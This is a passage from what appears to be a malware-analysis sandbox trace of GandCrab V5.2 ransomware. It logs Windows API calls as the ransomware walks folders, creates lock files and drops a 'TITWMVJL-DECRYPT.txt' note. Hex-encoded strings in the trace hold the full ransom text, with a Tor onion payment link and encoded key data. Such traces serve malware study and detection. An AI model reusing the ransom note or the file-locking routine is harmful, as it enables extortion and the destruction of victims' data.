x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.619] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0095.619] CloseHandle (hObject=0x2c4) returned 1 [0095.619] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.620] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.620] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x3ad)) [0095.620] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.620] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.620] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.620] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\d2ca4a09d2ca4deb61a.lock") returned 119 [0095.620] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0095.627] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.627] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.627] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\") returned 95 [0095.627] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\*" [0095.627] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5032f8 [0095.627] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.627] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0095.628] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.628] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.628] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0095.628] lstrcmpW (lpString1="8_KuX", lpString2=".") returned 1 [0095.628] lstrcmpW (lpString1="8_KuX", lpString2="..") returned 1 [0095.629] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\", lpString2="8_KuX" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX" [0095.629] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\" [0095.629] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.629] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.629] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.629] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.629] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.629] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.629] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.629] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.630] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.630] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.630] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.630] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\\\TITWMVJL-DECRYPT.txt") returned 122 [0095.630] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\8_KuX\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\8_kux\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0095.631] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x